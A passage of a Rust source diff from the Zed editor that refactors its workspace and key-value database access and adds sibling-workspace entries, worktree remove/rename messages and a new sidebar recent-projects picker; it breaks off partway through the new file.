(GetSharedAgentThreadResponse, Foreground),
@@ -557,6 +559,8 @@ request_messages!(
(RemoteStarted, Ack),
(GitGetWorktrees, GitWorktreesResponse),
(GitCreateWorktree, Ack),
+ (GitRemoveWorktree, Ack),
+ (GitRenameWorktree, Ack),
(TrustWorktrees, Ack),
(RestrictWorktrees, Ack),
(FindSearchCandidatesChunk, Ack),
@@ -747,6 +751,8 @@ entity_messages!(
NewExternalAgentVersionAvailable,
GitGetWorktrees,
GitCreateWorktree,
+ GitRemoveWorktree,
+ GitRenameWorktree,
TrustWorktrees,
RestrictWorktrees,
FindSearchCandidatesChunk,
@@ -1,9 +1,10 @@
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use dev_container::find_configs_in_snapshot;
use gpui::{SharedString, Window};
use project::{Project, WorktreeId};
use std::sync::LazyLock;
use ui::prelude::*;
+use util::ResultExt;
use util::rel_path::RelPath;
use workspace::Workspace;
use workspace::notifications::NotificationId;
@@ -61,7 +62,7 @@ pub fn suggest_on_worktree_updated(
let project_path = abs_path.to_string_lossy().to_string();
let key_for_dismiss = project_devcontainer_key(&project_path);
- let already_dismissed = KEY_VALUE_STORE
+ let already_dismissed = KeyValueStore::global(cx)
.read_kvp(&key_for_dismiss)
.ok()
.flatten()
@@ -98,9 +99,13 @@ pub fn suggest_on_worktree_updated(
.secondary_on_click({
move |_window, cx| {
let key = key_for_dismiss.clone();
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string())
- });
+ let kvp = KeyValueStore::global(cx);
+ cx.background_spawn(async move {
+ kvp.write_kvp(key, "dismissed".to_string())
+ .await
+ .log_err();
+ })
+ .detach();
}
})
})
@@ -2,11 +2,7 @@ use gpui::{ClickEvent, DismissEvent, EventEmitter, FocusHandle, Focusable, Rende
use project::project_settings::ProjectSettings;
use remote::RemoteConnectionOptions;
use settings::Settings;
-use ui::{
- Button, ButtonCommon, ButtonStyle, Clickable, Context, ElevationIndex, FluentBuilder, Headline,
- HeadlineSize, IconName, IconPosition, InteractiveElement, IntoElement, Label, Modal,
- ModalFooter, ModalHeader, ParentElement, Section, Styled, StyledExt, Window, div, h_flex, rems,
-};
+use ui::{ElevationIndex, Modal, ModalFooter, ModalHeader, Section, prelude::*};
use workspace::{
ModalView, MultiWorkspace, OpenOptions, Workspace, notifications::DetachAndPromptErr,
};
@@ -207,8 +203,7 @@ impl Render for DisconnectedOverlay {
Button::new("reconnect", "Reconnect")
.style(ButtonStyle::Filled)
.layer(ElevationIndex::ModalSurface)
- .icon(IconName::ArrowCircle)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::ArrowCircle))
.on_click(cx.listener(Self::handle_reconnect)),
)
}),
@@ -2,9 +2,11 @@ mod dev_container_suggest;
pub mod disconnected_overlay;
mod remote_connections;
mod remote_servers;
+pub mod sidebar_recent_projects;
mod ssh_config;
use std::{
+ collections::HashSet,
path::{Path, PathBuf},
sync::Arc,
};
@@ -45,7 +47,7 @@ use ui::{
use util::{ResultExt, paths::PathExt};
use workspace::{
HistoryManager, ModalView, MultiWorkspace, OpenOptions, OpenVisible, PathList,
- SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId,
+ SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId,
notifications::DetachAndPromptErr, with_active_or_new_workspace,
};
use zed_actions::{OpenDevContainer, OpenRecent, OpenRemote};
@@ -74,6 +76,7 @@ struct OpenFolderEntry {
enum ProjectPickerEntry {
Header(SharedString),
OpenFolder { index: usize, positions: Vec<usize> },
+ OpenProject(StringMatch),
RecentProject(StringMatch),
}
@@ -87,8 +90,9 @@ pub async fn get_recent_projects(
current_workspace_id: Option<WorkspaceId>,
limit: Option<usize>,
fs: Arc<dyn fs::Fs>,
+ db: &WorkspaceDb,
) -> Vec<RecentProjectEntry> {
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.unwrap_or_default();
@@ -137,8 +141,8 @@ pub async fn get_recent_projects(
}
}
-pub async fn delete_recent_project(workspace_id: WorkspaceId) {
- let _ = WORKSPACE_DB.delete_workspace_by_id(workspace_id).await;
+pub async fn delete_recent_project(workspace_id: WorkspaceId, db: &WorkspaceDb) {
+ let _ = db.delete_workspace_by_id(workspace_id).await;
}
fn get_open_folders(workspace: &Workspace, cx: &App) -> Vec<OpenFolderEntry> {
@@ -198,17 +202,19 @@ fn get_branch_for_worktree(
cx: &App,
) -> Option<SharedString> {
let worktree_abs_path = worktree.abs_path();
- for repo in repositories {
- let repo = repo.read(cx);
- if repo.work_directory_abs_path == worktree_abs_path
- || worktree_abs_path.starts_with(&*repo.work_directory_abs_path)
- {
- if let Some(branch) = &repo.branch {
- return Some(SharedString::from(branch.name().to_string()));
- }
- }
- }
- None
+ repositories
+ .iter()
+ .filter(|repo| {
+ let repo_path = &repo.read(cx).work_directory_abs_path;
+ *repo_path == worktree_abs_path || worktree_abs_path.starts_with(repo_path.as_ref())
+ })
+ .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len())
+ .and_then(|repo| {
+ repo.read(cx)
+ .branch
+ .as_ref()
+ .map(|branch| SharedString::from(branch.name().to_string()))
+ })
}
pub fn init(cx: &mut App) {
@@ -337,19 +343,71 @@ pub fn init(cx: &mut App) {
cx.on_action(|open_recent: &OpenRecent, cx| {
let create_new_window = open_recent.create_new_window;
- with_active_or_new_workspace(cx, move |workspace, window, cx| {
- let Some(recent_projects) = workspace.active_modal::<RecentProjects>(cx) else {
- let focus_handle = workspace.focus_handle(cx);
- RecentProjects::open(workspace, create_new_window, window, focus_handle, cx);
- return;
- };
- recent_projects.update(cx, |recent_projects, cx| {
- recent_projects
- .picker
- .update(cx, |picker, cx| picker.cycle_selection(window, cx))
- });
- });
+ match cx
+ .active_window()
+ .and_then(|w| w.downcast::<MultiWorkspace>())
+ {
+ Some(multi_workspace) => {
+ cx.defer(move |cx| {
+ multi_workspace
+ .update(cx, |multi_workspace, window, cx| {
+ let sibling_workspace_ids: HashSet<WorkspaceId> = multi_workspace
+ .workspaces()
+ .iter()
+ .filter_map(|ws| ws.read(cx).database_id())
+ .collect();
+
+ let workspace = multi_workspace.workspace().clone();
+ workspace.update(cx, |workspace, cx| {
+ let Some(recent_projects) =
+ workspace.active_modal::<RecentProjects>(cx)
+ else {
+ let focus_handle = workspace.focus_handle(cx);
+ RecentProjects::open(
+ workspace,
+ create_new_window,
+ sibling_workspace_ids,
+ window,
+ focus_handle,
+ cx,
+ );
+ return;
+ };
+
+ recent_projects.update(cx, |recent_projects, cx| {
+ recent_projects
+ .picker
+ .update(cx, |picker, cx| picker.cycle_selection(window, cx))
+ });
+ });
+ })
+ .log_err();
+ });
+ }
+ None => {
+ with_active_or_new_workspace(cx, move |workspace, window, cx| {
+ let Some(recent_projects) = workspace.active_modal::<RecentProjects>(cx) else {
+ let focus_handle = workspace.focus_handle(cx);
+ RecentProjects::open(
+ workspace,
+ create_new_window,
+ HashSet::new(),
+ window,
+ focus_handle,
+ cx,
+ );
+ return;
+ };
+
+ recent_projects.update(cx, |recent_projects, cx| {
+ recent_projects
+ .picker
+ .update(cx, |picker, cx| picker.cycle_selection(window, cx))
+ });
+ });
+ }
+ }
});
cx.on_action(|open_remote: &OpenRemote, cx| {
let from_existing_connection = open_remote.from_existing_connection;
@@ -469,7 +527,7 @@ pub fn add_wsl_distro(
pub struct RecentProjects {
pub picker: Entity<Picker<RecentProjectsDelegate>>,
rem_width: f32,
- _subscription: Subscription,
+ _subscriptions: Vec<Subscription>,
}
impl ModalView for RecentProjects {
@@ -493,6 +551,7 @@ impl RecentProjects {
window: &mut Window,
cx: &mut Context<Self>,
) -> Self {
+ let style = delegate.style;
let picker = cx.new(|cx| {
Picker::list(delegate, window, cx)
.list_measure_all()
@@ -504,16 +563,32 @@ impl RecentProjects {
picker.delegate.focus_handle = picker_focus_handle;
});
- let _subscription = cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent));
+ let mut subscriptions = vec![cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent))];
+
+ if style == ProjectPickerStyle::Popover {
+ let picker_focus = picker.focus_handle(cx);
+ subscriptions.push(
+ cx.on_focus_out(&picker_focus, window, |this, _, window, cx| {
+ let submenu_focused = this.picker.update(cx, |picker, cx| {
+ picker.delegate.actions_menu_handle.is_focused(window, cx)
+ });
+ if !submenu_focused {
+ cx.emit(DismissEvent);
+ }
+ }),
+ );
+ }
// We do not want to block the UI on a potentially lengthy call to DB, so we're gonna swap
// out workspace locations once the future runs to completion.
+ let db = WorkspaceDb::global(cx);
cx.spawn_in(window, async move |this, cx| {
let Some(fs) = fs else { return };
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.log_err()
.unwrap_or_default();
+ let workspaces = workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
this.update_in(cx, move |this, window, cx| {
this.picker.update(cx, move |picker, cx| {
picker.delegate.set_workspaces(workspaces);
@@ -526,13 +601,14 @@ impl RecentProjects {
Self {
picker,
rem_width,
- _subscription,
+ _subscriptions: subscriptions,
}
}
pub fn open(
workspace: &mut Workspace,
create_new_window: bool,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
window: &mut Window,
focus_handle: FocusHandle,
cx: &mut Context<Workspace>,
@@ -541,12 +617,14 @@ impl RecentProjects {
let open_folders = get_open_folders(workspace, cx);
let project_connection_options = workspace.project().read(cx).remote_connection_options(cx);
let fs = Some(workspace.app_state().fs.clone());
+
workspace.toggle_modal(window, cx, |window, cx| {
let delegate = RecentProjectsDelegate::new(
weak,
create_new_window,
focus_handle,
open_folders,
+ sibling_workspace_ids,
project_connection_options,
ProjectPickerStyle::Modal,
);
@@ -557,6 +635,7 @@ impl RecentProjects {
pub fn popover(
workspace: WeakEntity<Workspace>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
create_new_window: bool,
focus_handle: FocusHandle,
window: &mut Window,
@@ -580,6 +659,7 @@ impl RecentProjects {
create_new_window,
focus_handle,
open_folders,
+ sibling_workspace_ids,
project_connection_options,
ProjectPickerStyle::Popover,
);
@@ -627,6 +707,7 @@ impl Render for RecentProjects {
pub struct RecentProjectsDelegate {
workspace: WeakEntity<Workspace>,
open_folders: Vec<OpenFolderEntry>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
workspaces: Vec<(
WorkspaceId,
SerializedWorkspaceLocation,
@@ -652,6 +733,7 @@ impl RecentProjectsDelegate {
create_new_window: bool,
focus_handle: FocusHandle,
open_folders: Vec<OpenFolderEntry>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
project_connection_options: Option<RemoteConnectionOptions>,
style: ProjectPickerStyle,
) -> Self {
@@ -659,6 +741,7 @@ impl RecentProjectsDelegate {
Self {
workspace,
open_folders,
+ sibling_workspace_ids,
workspaces: Vec::new(),
filtered_entries: Vec::new(),
selected_index: 0,
@@ -705,32 +788,14 @@ impl PickerDelegate for RecentProjectsDelegate {
window: &mut Window,
cx: &mut Context<Picker<Self>>,
) -> Div {
- let focus_handle = self.focus_handle.clone();
-
h_flex()
.flex_none()
.h_9()
- .pl_2p5()
- .pr_1p5()
+ .px_2p5()
.justify_between()
.border_b_1()
.border_color(cx.theme().colors().border_variant)
.child(editor.render(window, cx))
- .child(
- IconButton::new("add_folder", IconName::Plus)
- .icon_size(IconSize::Small)
- .tooltip(move |_, cx| {
- Tooltip::for_action_in(
- "Add Project to Workspace",
- &workspace::AddFolderToProject,
- &focus_handle,
- cx,
- )
- })
- .on_click(|_, window, cx| {
- window.dispatch_action(workspace::AddFolderToProject.boxed_clone(), cx)
- }),
- )
}
fn match_count(&self) -> usize {
@@ -753,7 +818,11 @@ impl PickerDelegate for RecentProjectsDelegate {
fn can_select(&self, ix: usize, _window: &mut Window, _cx: &mut Context<Picker<Self>>) -> bool {
matches!(
self.filtered_entries.get(ix),
- Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::RecentProject(_))
+ Some(
+ ProjectPickerEntry::OpenFolder { .. }
+ | ProjectPickerEntry::OpenProject(_)
+ | ProjectPickerEntry::RecentProject(_)
+ )
)
}
@@ -788,6 +857,38 @@ impl PickerDelegate for RecentProjectsDelegate {
))
};
+ let sibling_candidates: Vec<_> = self
+ .workspaces
+ .iter()
+ .enumerate()
+ .filter(|(_, (id, _, _, _))| self.is_sibling_workspace(*id, cx))
+ .map(|(id, (_, _, paths, _))| {
+ let combined_string = paths
+ .ordered_paths()
+ .map(|path| path.compact().to_string_lossy().into_owned())
+ .collect::<Vec<_>>()
+ .join("");
+ StringMatchCandidate::new(id, &combined_string)
+ })
+ .collect();
+
+ let mut sibling_matches = smol::block_on(fuzzy::match_strings(
+ &sibling_candidates,
+ query,
+ smart_case,
+ true,
+ 100,
+ &Default::default(),
+ cx.background_executor().clone(),
+ ));
+ sibling_matches.sort_unstable_by(|a, b| {
+ b.score
+ .partial_cmp(&a.score)
+ .unwrap_or(std::cmp::Ordering::Equal)
+ .then_with(|| a.candidate_id.cmp(&b.candidate_id))
+ });
+
+ // Build candidates for recent projects (not current, not sibling, not open folder)
let recent_candidates: Vec<_> = self
.workspaces
.iter()
@@ -838,6 +939,33 @@ impl PickerDelegate for RecentProjectsDelegate {
}
}
+ let has_siblings_to_show = if is_empty_query {
+ !sibling_candidates.is_empty()
+ } else {
+ !sibling_matches.is_empty()
+ };
+
+ if has_siblings_to_show {
+ entries.push(ProjectPickerEntry::Header("This Window".into()));
+
+ if is_empty_query {
+ for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() {
+ if self.is_sibling_workspace(*workspace_id, cx) {
+ entries.push(ProjectPickerEntry::OpenProject(StringMatch {
+ candidate_id: id,
+ score: 0.0,
+ positions: Vec::new(),
+ string: String::new(),
+ }));
+ }
+ }
+ } else {
+ for m in sibling_matches {
+ entries.push(ProjectPickerEntry::OpenProject(m));
+ }
+ }
+ }
+
let has_recent_to_show = if is_empty_query {
!recent_candidates.is_empty()
} else {
@@ -892,6 +1020,32 @@ impl PickerDelegate for RecentProjectsDelegate {
}
cx.emit(DismissEvent);
}
+ Some(ProjectPickerEntry::OpenProject(selected_match)) => {
+ let Some((workspace_id, _, _, _)) =
+ self.workspaces.get(selected_match.candidate_id)
+ else {
+ return;
+ };
+ let workspace_id = *workspace_id;
+
+ if let Some(handle) = window.window_handle().downcast::<MultiWorkspace>() {
+ cx.defer(move |cx| {
+ handle
+ .update(cx, |multi_workspace, _window, cx| {
+ let workspace = multi_workspace
+ .workspaces()
+ .iter()
+ .find(|ws| ws.read(cx).database_id() == Some(workspace_id))
+ .cloned();
+ if let Some(workspace) = workspace {
+ multi_workspace.activate(workspace, cx);
+ }
+ })
+ .log_err();
+ });
+ }
+ cx.emit(DismissEvent);
+ }
Some(ProjectPickerEntry::RecentProject(selected_match)) => {
let Some(workspace) = self.workspace.upgrade() else {
return;
@@ -935,7 +1089,14 @@ impl PickerDelegate for RecentProjectsDelegate {
}
return;
} else {
- workspace.open_workspace_for_paths(false, paths, window, cx)
+ workspace
+ .open_workspace_for_paths(false, paths, window, cx)
+ .detach_and_prompt_err(
+ "Failed to open project",
+ window,
+ cx,
+ |_, _, _| None,
+ );
}
}
SerializedWorkspaceLocation::Remote(mut connection) => {
@@ -964,14 +1125,14 @@ impl PickerDelegate for RecentProjectsDelegate {
)
.await
})
+ .detach_and_prompt_err(
+ "Failed to open project",
+ window,
+ cx,
+ |_, _, _| None,
+ );
}
}
- .detach_and_prompt_err(
- "Failed to open project",
- window,
- cx,
- |_, _, _| None,
- );
});
cx.emit(DismissEvent);
}
@@ -1103,17 +1264,125 @@ impl PickerDelegate for RecentProjectsDelegate {
.into_any_element(),
)
}
+ ProjectPickerEntry::OpenProject(hit) => {
+ let (workspace_id, location, paths, _) = self.workspaces.get(hit.candidate_id)?;
+ let workspace_id = *workspace_id;
+ let ordered_paths: Vec<_> = paths
+ .ordered_paths()
+ .map(|p| p.compact().to_string_lossy().to_string())
+ .collect();
+ let tooltip_path: SharedString = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ let host = options.display_name();
+ if ordered_paths.len() == 1 {
+ format!("{} ({})", ordered_paths[0], host).into()
+ } else {
+ format!("{}\n({})", ordered_paths.join("\n"), host).into()
+ }
+ }
+ _ => ordered_paths.join("\n").into(),
+ };
+
+ let mut path_start_offset = 0;
+ let (match_labels, paths): (Vec<_>, Vec<_>) = paths
+ .ordered_paths()
+ .map(|p| p.compact())
+ .map(|path| {
+ let highlighted_text =
+ highlights_for_path(path.as_ref(), &hit.positions, path_start_offset);
+ path_start_offset += highlighted_text.1.text.len();
+ highlighted_text
+ })
+ .unzip();
+
+ let prefix = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ Some(SharedString::from(options.display_name()))
+ }
+ _ => None,
+ };
+
+ let highlighted_match = HighlightedMatchWithPaths {
+ prefix,
+ match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "),
+ paths,
+ };
+
+ let icon = icon_for_remote_connection(match location {
+ SerializedWorkspaceLocation::Local => None,
+ SerializedWorkspaceLocation::Remote(options) => Some(options),
+ });
+
+ let secondary_actions = h_flex()
+ .gap_1()
+ .child(
+ IconButton::new("remove_open_project", IconName::Close)
+ .icon_size(IconSize::Small)
+ .tooltip(Tooltip::text("Remove Project from Window"))
+ .on_click(cx.listener(move |picker, _, window, cx| {
+ cx.stop_propagation();
+ window.prevent_default();
+ picker
+ .delegate
+ .remove_sibling_workspace(workspace_id, window, cx);
+ let query = picker.query(cx);
+ picker.update_matches(query, window, cx);
+ })),
+ )
+ .into_any_element();
+
+ Some(
+ ListItem::new(ix)
+ .toggle_state(selected)
+ .inset(true)
+ .spacing(ListItemSpacing::Sparse)
+ .child(
+ h_flex()
+ .id("open_project_info_container")
+ .gap_3()
+ .flex_grow()
+ .when(self.has_any_non_local_projects, |this| {
+ this.child(Icon::new(icon).color(Color::Muted))
+ })
+ .child({
+ let mut highlighted = highlighted_match;
+ if !self.render_paths {
+ highlighted.paths.clear();
+ }
+ highlighted.render(window, cx)
+ })
+ .tooltip(Tooltip::text(tooltip_path)),
+ )
+ .map(|el| {
+ if self.selected_index == ix {
+ el.end_slot(secondary_actions)
+ } else {
+ el.end_hover_slot(secondary_actions)
+ }
+ })
+ .into_any_element(),
+ )
+ }
ProjectPickerEntry::RecentProject(hit) => {
let popover_style = matches!(self.style, ProjectPickerStyle::Popover);
let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?;
let is_local = matches!(location, SerializedWorkspaceLocation::Local);
let paths_to_add = paths.paths().to_vec();
- let tooltip_path: SharedString = paths
+ let ordered_paths: Vec<_> = paths
.ordered_paths()
.map(|p| p.compact().to_string_lossy().to_string())
- .collect::<Vec<_>>()
- .join("\n")
- .into();
+ .collect();
+ let tooltip_path: SharedString = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ let host = options.display_name();
+ if ordered_paths.len() == 1 {
+ format!("{} ({})", ordered_paths[0], host).into()
+ } else {
+ format!("{}\n({})", ordered_paths.join("\n"), host).into()
+ }
+ }
+ _ => ordered_paths.join("\n").into(),
+ };
let mut path_start_offset = 0;
let (match_labels, paths): (Vec<_>, Vec<_>) = paths
@@ -1146,9 +1415,9 @@ impl PickerDelegate for RecentProjectsDelegate {
.gap_px()
.when(is_local, |this| {
this.child(
- IconButton::new("add_to_workspace", IconName::Plus)
+ IconButton::new("add_to_workspace", IconName::FolderPlus)
.icon_size(IconSize::Small)
- .tooltip(Tooltip::text("Add Project to Workspace"))
+ .tooltip(Tooltip::text("Add Project to this Workspace"))
.on_click({
let paths_to_add = paths_to_add.clone();
cx.listener(move |picker, _event, window, cx| {
@@ -1240,9 +1509,9 @@ impl PickerDelegate for RecentProjectsDelegate {
fn render_footer(&self, _: &mut Window, cx: &mut Context<Picker<Self>>) -> Option<AnyElement> {
let focus_handle = self.focus_handle.clone();
let popover_style = matches!(self.style, ProjectPickerStyle::Popover);
- let open_folder_section = matches!(
- self.filtered_entries.get(self.selected_index)?,
- ProjectPickerEntry::OpenFolder { .. }
+ let is_already_open_entry = matches!(
+ self.filtered_entries.get(self.selected_index),
+ Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::OpenProject(_))
);
if popover_style {
@@ -1296,7 +1565,7 @@ impl PickerDelegate for RecentProjectsDelegate {
.border_t_1()
.border_color(cx.theme().colors().border_variant)
.map(|this| {
- if open_folder_section {
+ if is_already_open_entry {
this.child(
Button::new("activate", "Activate")
.key_binding(KeyBinding::for_action_in(
@@ -1382,7 +1651,7 @@ impl PickerDelegate for RecentProjectsDelegate {
}
}
-fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName {
+pub(crate) fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName {
match options {
None => IconName::Screen,
Some(options) => match options {
@@ -1396,7 +1665,7 @@ fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> Icon
}
// Compute the highlighted text for the name and path
-fn highlights_for_path(
+pub(crate) fn highlights_for_path(
path: &Path,
match_positions: &Vec<usize>,
path_start_offset: usize,
@@ -1495,16 +1764,16 @@ impl RecentProjectsDelegate {
.workspace
.upgrade()
.map(|ws| ws.read(cx).app_state().fs.clone());
+ let db = WorkspaceDb::global(cx);
cx.spawn_in(window, async move |this, cx| {
- WORKSPACE_DB
- .delete_workspace_by_id(workspace_id)
- .await
- .log_err();
+ db.delete_workspace_by_id(workspace_id).await.log_err();
let Some(fs) = fs else { return };
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.unwrap_or_default();
+ let workspaces =
+ workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
this.update_in(cx, move |picker, window, cx| {
picker.delegate.set_workspaces(workspaces);
picker
@@ -1525,6 +1794,31 @@ impl RecentProjectsDelegate {
}
}
+ fn remove_sibling_workspace(
+ &mut self,
+ workspace_id: WorkspaceId,
+ window: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) {
+ if let Some(handle) = window.window_handle().downcast::<MultiWorkspace>() {
+ cx.defer(move |cx| {
+ handle
+ .update(cx, |multi_workspace, window, cx| {
+ let index = multi_workspace
+ .workspaces()
+ .iter()
+ .position(|ws| ws.read(cx).database_id() == Some(workspace_id));
+ if let Some(index) = index {
+ multi_workspace.remove_workspace(index, window, cx);
+ }
+ })
+ .log_err();
+ });
+ }
+
+ self.sibling_workspace_ids.remove(&workspace_id);
+ }
+
fn is_current_workspace(
&self,
workspace_id: WorkspaceId,
@@ -1540,6 +1834,15 @@ impl RecentProjectsDelegate {
false
}
+ fn is_sibling_workspace(
+ &self,
+ workspace_id: WorkspaceId,
+ cx: &mut Context<Picker<Self>>,
+ ) -> bool {
+ self.sibling_workspace_ids.contains(&workspace_id)
+ && !self.is_current_workspace(workspace_id, cx)
+ }
+
fn is_open_folder(&self, paths: &PathList) -> bool {
if self.open_folders.is_empty() {
return false;
@@ -1562,7 +1865,9 @@ impl RecentProjectsDelegate {
paths: &PathList,
cx: &mut Context<Picker<Self>>,
) -> bool {
- !self.is_current_workspace(workspace_id, cx) && !self.is_open_folder(paths)
+ !self.is_current_workspace(workspace_id, cx)
+ && !self.is_sibling_workspace(workspace_id, cx)
+ && !self.is_open_folder(paths)
}
}
@@ -10,7 +10,6 @@ use extension_host::ExtensionStore;
use futures::{FutureExt as _, channel::oneshot, select};
use gpui::{AppContext, AsyncApp, PromptLevel, WindowHandle};
-use language::Point;
use project::trusted_worktrees;
use remote::{
DockerConnectionOptions, Interactive, RemoteConnection, RemoteConnectionOptions,
@@ -458,7 +457,12 @@ pub fn navigate_to_positions(
active_editor.update(cx, |editor, cx| {
let row = row.saturating_sub(1);
let col = path.column.unwrap_or(0).saturating_sub(1);
- editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx);
+ let Some(buffer) = editor.buffer().read(cx).as_singleton() else {
+ return;
+ };
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let point = buffer_snapshot.point_from_external_input(row, col);
+ editor.go_to_singleton_buffer_point(point, window, cx);
});
})
.ok();
@@ -17,7 +17,6 @@ use gpui::{
EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task,
WeakEntity, Window, canvas,
};
-use language::Point;
use log::{debug, info};
use open_path_prompt::OpenPathDelegate;
use paths::{global_ssh_config_file, user_ssh_config_file};
@@ -390,7 +389,7 @@ impl ProjectPicker {
) -> Entity<Self> {
let (tx, rx) = oneshot::channel();
let lister = project::DirectoryLister::Project(project.clone());
- let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx);
+ let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx).show_hidden();
let picker = cx.new(|cx| {
let picker = Picker::uniform_list(delegate, window, cx)
@@ -519,11 +518,15 @@ impl ProjectPicker {
active_editor.update(cx, |editor, cx| {
let row = row.saturating_sub(1);
let col = path.column.unwrap_or(0).saturating_sub(1);
- editor.go_to_singleton_buffer_point(
- Point::new(row, col),
- window,
- cx,
- );
+ let Some(buffer) =
+ editor.buffer().read(cx).as_singleton()
+ else {
+ return;
+ };
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let point =
+ buffer_snapshot.point_from_external_input(row, col);
+ editor.go_to_singleton_buffer_point(point, window, cx);
});
})
.ok();
@@ -2117,8 +2120,10 @@ impl RemoteServerProjects {
.child(
Button::new("learn-more", "Learn More")
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall),
+ )
.on_click(|_, _, cx| {
cx.open_url(
"https://zed.dev/docs/remote-development",
@@ -0,0 +1,424 @@
+use std::collections::HashSet;
+use std::sync::Arc;
+
+use chrono::{DateTime, Utc};
+use fuzzy::{StringMatch, StringMatchCandidate};
+use gpui::{
+ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable,
+ Subscription, Task, WeakEntity, Window,
+};
+use picker::{
+ Picker, PickerDelegate,
+ highlighted_match_with_paths::{HighlightedMatch, HighlightedMatchWithPaths},
+};
+use remote::RemoteConnectionOptions;
+use settings::Settings;
+use ui::{KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*};
+use ui_input::ErasedEditor;
+use util::{ResultExt, paths::PathExt};
+use workspace::{
+ MultiWorkspace, OpenOptions, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceDb,
+ WorkspaceId, notifications::DetachAndPromptErr,
+};
+
+use crate::{highlights_for_path, icon_for_remote_connection, open_remote_project};
+
+pub struct SidebarRecentProjects {
+ pub picker: Entity<Picker<SidebarRecentProjectsDelegate>>,
+ _subscription: Subscription,
+}
+
+impl SidebarRecentProjects {
+ pub fn popover(
+ workspace: WeakEntity<Workspace>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
+ _focus_handle: FocusHandle,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> Entity<Self> {
+ let fs = workspace
+ .upgrade()
+ .map(|ws| ws.read(cx).app_state().fs.clone());
+
+ cx.new(|cx| {
+ let delegate = SidebarRecentProjectsDelegate {
+ workspace,
+ sibling_workspace_ids,
+ workspaces: Vec::new(),
+ filtered_workspaces: Vec::new(),
+ selected_index: 0,
+ has_any_non_local_projects: false,
+ focus_handle: cx.focus_handle(),
+ };
+
+ let picker: Entity<Picker<SidebarRecentProjectsDelegate>> = cx.new(|cx| {
+ Picker::list(delegate, window, cx)
+ .list_measure_all()
+ .show_scrollbar(true)
+ });
+
+ let picker_focus_handle = picker.focus_handle(cx);
+ picker.update(cx, |picker, _| {
+ picker.delegate.focus_handle = picker_focus_handle;
+ });
+
+ let _subscription =
+ cx.subscribe(&picker, |_this: &mut Self, _, _, cx| cx.emit(DismissEvent));
+
+ let db = WorkspaceDb::global(cx);
+ cx.spawn_in(window, async move |this, cx| {
+ let Some(fs) = fs else { return };
+ let workspaces = db
+ .recent_workspaces_on_disk(fs.as_ref())
+ .await
+ .log_err()
+ .unwrap_or_default();
+ let workspaces =
+ workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
+ this.update_in(cx, move |this, window, cx| {
+ this.picker.update(cx, move |picker, cx| {
+ picker.delegate.set_workspaces(workspaces);
+ picker.update_matches(picker.query(cx), window, cx)
+ })
+ })
+ .ok();
+ })
+ .detach();
+
+ picker.focus_handle(cx).focus(window, cx);
+
+ Self {
+ picker,
+ _subscription,
+ }
+ })
+ }
+}
+
+impl EventEmitter<DismissEvent> for SidebarRecentProjects {}
+
+impl Focusable for SidebarRecentProjects {
+ fn focus_handle(&self, cx: &App) -> FocusHandle {
+ self.picker.focus_handle(cx)
+ }
+}
+
+impl Render for SidebarRecentProjects {
+ fn render(&mut self, _: &mut Window, _cx: &mut Context<Self>) -> impl IntoElement {
+ v_flex()
+ .key_context("SidebarRecentProjects")
+ .w(rems(18.))
+ .child(self.picker.clone())
+ }
+}
+
+pub struct SidebarRecentProjectsDelegate {
+ workspace: WeakEntity<Workspace>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
+ workspaces: Vec<(
+ WorkspaceId,
+ SerializedWorkspaceLocation,
+ PathList,
+ DateTime<Utc>,
+ )>,
+ filtered_workspaces: Vec<StringMatch>,
+ selected_index: usize,
+ has_any_non_local_projects: bool,
+ focus_handle: FocusHandle,
+}
+
+impl SidebarRecentProjectsDelegate {
+ pub fn set_workspaces(
+ &mut self,
+ workspaces: Vec<(
+ WorkspaceId,
+ SerializedWorkspaceLocation,
+ PathList,
